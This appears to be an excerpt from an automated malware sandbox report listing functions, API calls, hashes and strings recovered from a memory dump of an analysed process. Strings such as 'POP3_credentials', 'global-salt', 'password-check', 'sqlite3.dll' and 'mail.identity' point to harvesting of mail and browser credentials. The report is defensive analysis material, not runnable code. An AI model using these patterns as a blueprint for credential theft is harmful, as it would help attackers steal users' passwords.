                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040810E
                                                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                  • LocalFree.KERNEL32(?,?,?,?,?,00000000,75A8EB20,?), ref: 004081B9
                                                    • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                  • String ID: POP3_credentials$POP3_host$POP3_name
                                                  • API String ID: 524865279-2190619648
                                                  • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                  • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                                  • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                                  • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 004091EC
                                                  • sprintf.MSVCRT ref: 00409201
                                                    • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                    • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                    • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                                  • SetWindowTextA.USER32(?,?), ref: 00409228
                                                  • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                  • String ID: caption$dialog_%d
                                                  • API String ID: 2923679083-4161923789
                                                  • Opcode ID: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                  • Instruction ID: 6e7d5c99c97eb3a6ca4510ecd50999ddf5df62a663a14868e976e94052726d92
                                                  • Opcode Fuzzy Hash: 873fb4d128c81b604fb18c2010503b3c06e4abe8b396b72ee5fcb0b2d1fc8e6c
                                                  • Instruction Fuzzy Hash: ADF09C706442897EFB12DBA0DD06FC57B689708706F0000A6BB48E50D2D6F89D84872E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • wcslen.MSVCRT ref: 0044406C
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                                    • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                                  • strlen.MSVCRT ref: 004440D1
                                                    • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                                    • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                                  • memcpy.MSVCRT ref: 004440EB
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                                  • String ID:
                                                  • API String ID: 577244452-0
                                                  • Opcode ID: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                  • Instruction ID: 3a965f982735d3f8f3afa93a9d35b3cc19a0dc4d5d85c2e22613d8d88a70f0fa
                                                  • Opcode Fuzzy Hash: 20a3a8ba08b433d408bc1d9acc18c6cdba7529d035fe16c150172471e115ed75
                                                  • Instruction Fuzzy Hash: 00317971800259AFEF21EF61C881ADDBBB4EF84314F0441AAF40863241DB396F85CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memset.MSVCRT ref: 0040C02D
                                                    • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                    • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                                    • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                                    • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                    • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                    • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                    • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                                    • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                    • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                                    • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                  • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                  • API String ID: 2726666094-3614832568
                                                  • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                  • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                  • Opcode Fuzzy Hash: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                  • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                  • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                  • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                  • OpenClipboard.USER32(?), ref: 0040C1B1
                                                  • GetLastError.KERNEL32 ref: 0040C1CA
                                                  • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                  • String ID:
                                                  • API String ID: 2014771361-0
                                                  • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                  • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                  • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                  • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • memcmp.MSVCRT ref: 00406151
                                                    • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                                    • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                                    • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                                  • memcmp.MSVCRT ref: 0040617C
                                                  • memcmp.MSVCRT ref: 004061A4
                                                  • memcpy.MSVCRT ref: 004061C1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcmp$memcpy
                                                  • String ID: global-salt$password-check
                                                  • API String ID: 231171946-3927197501
                                                  • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                  • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                  • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                  • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetParent.USER32(?), ref: 004090C2
                                                  • GetWindowRect.USER32(?,?), ref: 004090CF
                                                  • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                  • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                  • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Window$Rect$ClientParentPoints
                                                  • String ID:
                                                  • API String ID: 4247780290-0
                                                  • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                  • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                  • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                  • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _strcmpi$_mbscpy
                                                  • String ID: smtp
                                                  • API String ID: 2625860049-60245459
                                                  • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                  • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                  • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                  • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                  • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                  • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                  • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                  • String ID: MS Sans Serif
                                                  • API String ID: 3492281209-168460110
                                                  • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                  • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                  • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                  • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: ClassName_strcmpimemset
                                                  • String ID: edit
                                                  • API String ID: 275601554-2167791130
                                                  • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                  • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                  • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                  • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _strcmpi
                                                  • String ID: C@$mail.identity
                                                  • API String ID: 1439213657-721921413
                                                  • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                  • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                  • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                  • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _ultoasprintf
                                                  • String ID: %s %s %s
                                                  • API String ID: 432394123-3850900253
                                                  • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                  • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                  • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                  • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • LoadMenuA.USER32(00000000), ref: 00409078
                                                  • sprintf.MSVCRT ref: 0040909B
                                                    • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                    • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                    • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                    • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                    • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                    • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                  • String ID: menu_%d
                                                  • API String ID: 1129539653-2417748251
                                                  • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                  • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                  • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                  • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • _mbscpy.MSVCRT ref: 004070EB
                                                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                  • _mbscat.MSVCRT ref: 004070FA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: _mbscat$_mbscpystrlen
                                                  • String ID: sqlite3.dll
                                                  • API String ID: 1983510840-1155512374
                                                  • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                  • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                  • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                  • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.2276624898.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                  Similarity
                                                  • API ID: memcpy
                                                  • String ID:
                                                  • API String ID: 3510742995-0
                                                  • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                  • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                  • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                  • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%